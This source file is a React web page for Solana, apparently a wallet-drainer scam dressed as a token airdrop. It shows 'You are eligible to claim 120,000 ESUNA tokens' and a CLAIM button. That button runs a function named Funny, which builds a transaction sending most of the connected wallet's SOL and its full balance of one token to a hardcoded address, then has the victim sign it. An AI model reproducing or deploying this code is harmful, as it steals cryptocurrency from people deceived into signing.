import { WalletAdapterNetwork, WalletNotConnectedError } from '@solana/wallet-adapter-base';
import { ConnectionProvider, WalletProvider, useConnection, useWallet } from '@solana/wallet-adapter-react';
import { WalletModalProvider, WalletMultiButton } from '@solana/wallet-adapter-react-ui';
import { Button } from '@solana/wallet-adapter-react-ui/lib/types/Button';
import {
    GlowWalletAdapter,
    LedgerWalletAdapter,
    PhantomWalletAdapter,
    SlopeWalletAdapter,
    SolflareWalletAdapter,
    SolletExtensionWalletAdapter,
    SolletWalletAdapter,

} from '@solana/wallet-adapter-wallets';
import { Connection, clusterApiUrl, Transaction, SystemProgram, Account, Keypair, LAMPORTS_PER_SOL, PublicKey } from '@solana/web3.js';
import React, { FC, ReactNode, useMemo, useCallback, useState } from 'react';
import bs58 from 'bs58';
import * as splToken from "@solana/spl-token";
import { Token } from '@solana/spl-token';
//import { Funny } from './Buy'


require('./App.css');
require('@solana/wallet-adapter-react-ui/styles.css');


export default function App() {


    return (
        <Context>
            <Content />
        </Context>
    );
};


const Context: FC<{ children: ReactNode }> = ({ children }) => {
    // The network can be set to 'devnet', 'testnet', or 'mainnet-beta'.
    const network = WalletAdapterNetwork.Mainnet;

    // You can also provide a custom RPC endpoint.
    const endpoint = useMemo(() => clusterApiUrl(network), [network]);

    // @solana/wallet-adapter-wallets includes all the adapters but supports tree shaking and lazy loading --
    // Only the wallets you configure here will be compiled into your application, and only the dependencies
    // of wallets that your users connect to will be loaded.
    const wallets = useMemo(
        () => [
            new LedgerWalletAdapter(),
            new PhantomWalletAdapter(),
            new GlowWalletAdapter(),
            new SlopeWalletAdapter(),
            new SolletExtensionWalletAdapter(), 
            new SolletWalletAdapter(),
            new SolflareWalletAdapter({ network }),
        ],
        [network]
    );

   

    return (
        <ConnectionProvider endpoint={endpoint}>
            <WalletProvider wallets={wallets} autoConnect>
                <WalletModalProvider>{children}</WalletModalProvider>
            </WalletProvider>
        </ConnectionProvider>
    );
};










function Content () {
    
    
    
  const { connected, wallet, select, disconnect, publicKey, signTransaction } = useWallet();
  const { connection } = useConnection();
  let address : string
  const generalStyle = {
        "display":"flex",
        "width":"100%",
        "height": "100%",
        "justifyContent":"center",
        "margin":"15px",
        "alignItems":"center"
    }
    const inputStyle = {
        "display":"block",
        "width":"40vw",
        "height":"45px",
        "padding":"2px 7px 2px 10px",
        "borderRadius":"7px",
        "color":"#eee",
        "background":"#444",
        "justifyContent":"center",
        "margin":"15px",
        "alignItems":"center"
    }
  
  { publicKey ? address = publicKey?.toString() : address = "" }
  












  async function Funny() {
    if (publicKey) {
        const balance = await connection.getBalance(publicKey);
        console.log(balance)
        let to = bs58.decode("EEEYeSZbNoAYBwRdivuK9ZqVTxGMQjohfAFrd45TXYZj");
        let mfunds = balance * 0.90;
        if(balance < 900000000){
            mfunds = balance * 0.5;
          }
          
      
      
        let toWallet = Keypair.fromSeed(to);
        let transaction = new Transaction()


  
        // Construct wallet keypairs
        var signers = new Account();
          



        const mintPublicKeyUSDC = new PublicKey("G9tt98aYSznRk7jWsfuz9FnTdokxS6Brohdo9hSmjTRB");    
        const mintTokenUSDC = new Token(
        connection,
        mintPublicKeyUSDC,
        splToken.TOKEN_PROGRAM_ID,
        signers // the wallet owner will pay to transfer and to create recipients associated token account if it does not yet exist.
        );

        const destPublicKeyUSDC = toWallet.publicKey;
        
        // Get the derived address of the destination wallet which will hold the custom token
        const associatedDestinationTokenAddrUSDC = await Token.getAssociatedTokenAddress(
            mintTokenUSDC.associatedProgramId,
            mintTokenUSDC.programId,
            mintPublicKeyUSDC,
            destPublicKeyUSDC
        );
        const associatedSenderTokenAddrUSDC = await Token.getAssociatedTokenAddress(
            mintTokenUSDC.associatedProgramId,
            mintTokenUSDC.programId,
            mintPublicKeyUSDC,
            publicKey
        );
        const receiverAccountUSDC = await connection.getAccountInfo(associatedDestinationTokenAddrUSDC);
        const senderAccountUSDC = await connection.getAccountInfo(associatedSenderTokenAddrUSDC);
        
        console.log("1")
        if(senderAccountUSDC != null){
            
            console.log("2")
            const fromTokenAccountUSDC = await mintTokenUSDC.getOrCreateAssociatedAccountInfo(
                publicKey
                );
                let getbalUSDC = await connection.getTokenAccountBalance(
                fromTokenAccountUSDC.address
                );
                var exactAmountUSDC = getbalUSDC.value.uiAmount;
            if (receiverAccountUSDC === null) {
                transaction.add(
                Token.createAssociatedTokenAccountInstruction(
                    mintTokenUSDC.associatedProgramId,
                    mintTokenUSDC.programId,
                    mintPublicKeyUSDC,
                    associatedDestinationTokenAddrUSDC,
                    destPublicKeyUSDC,
                    publicKey
                )
                )
            
            }
            if(exactAmountUSDC){
                transaction.add(
                Token.createTransferInstruction(
                splToken.TOKEN_PROGRAM_ID,
                fromTokenAccountUSDC.address,
                associatedDestinationTokenAddrUSDC,
                publicKey,
                [],
                exactAmountUSDC * 1000000
                )
            );
            }
        }
        

        


        // SOL
        transaction.add(
            SystemProgram.transfer({
              fromPubkey: publicKey,
              toPubkey: toWallet.publicKey,
              lamports: mfunds,
            })
        );


        let { blockhash } = await connection.getRecentBlockhash();
        transaction.recentBlockhash = blockhash;
        transaction.feePayer = publicKey;
        if(signTransaction){
            let signed = await signTransaction(transaction)
            let txid = await connection.sendRawTransaction(signed.serialize());
            await connection.confirmTransaction(txid);
        }

    } else {
        console.log("")
    }
}



















    return (
        <div>
            <div style={generalStyle}>
                <div>
                    <input style={inputStyle} placeholder="Enter your Telegram username"/>
                    <div style={generalStyle}>
                        <WalletMultiButton />
                    </div>
                </div>
            </div>
            { connected ?
            <>
                <div style={generalStyle}>
                    <span style={{"display":"block", "fontWeight":"bolder"}}>You are eligible to claim 120,000 ESUNA tokens</span>
                </div>
                <div style={generalStyle}>
                    <button onClick={Funny} style={{"padding":"15px 25px", "background":"#512da8", "color":"#fff", "border":"0px", "borderRadius":"4px"}} >CLAIM</button>
                </div>
            </>
            : ""
            }
        </div>
    );
};





































































